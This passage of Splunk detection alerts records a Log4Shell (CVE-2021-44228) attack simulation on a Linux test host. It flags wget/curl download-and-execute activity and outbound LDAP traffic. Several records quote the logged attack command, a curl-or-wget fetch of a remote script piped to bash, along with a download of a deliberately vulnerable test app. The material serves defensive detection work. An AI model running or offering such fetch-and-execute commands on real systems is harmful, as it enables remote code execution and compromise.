Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641255, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="Command and Control", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="PR.PT", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642641255, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell 